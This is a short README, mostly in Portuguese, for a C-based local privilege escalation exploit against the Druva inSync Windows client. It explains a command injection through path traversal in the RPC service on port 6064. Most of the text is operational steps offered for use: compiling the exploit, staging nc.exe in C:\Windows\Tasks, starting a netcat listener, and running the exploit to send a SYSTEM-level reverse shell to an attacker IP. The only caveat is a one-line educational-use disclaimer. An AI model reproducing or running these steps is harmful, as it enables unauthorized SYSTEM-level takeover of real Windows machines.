
Escalação Local de Privilégios para Druva
Um exploit baseado em C para o Cliente Windows do Druva inSync (v6.6.3 e anteriores). O aplicativo expõe um serviço RPC na porta 6064 vulnerável a injeção de comandos via traversal de caminho. Isso permite que um usuário local execute comandos arbitrários como NT AUTHORITY\SYSTEM.
Use gcc (MinGW) para compilar o código-fonte:
gcc exploit.c -o exploit.exe -lws2_32
Coloque uma cópia do nc.exe em um diretório acessível pela conta SYSTEM (por exemplo, C:\Windows\Tasks).
Inicie um listener na sua máquina atacante:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
Esta ferramenta é apenas para fins educacionais. O uso não autorizado em sistemas que você não tem permissão para testar é ilegal.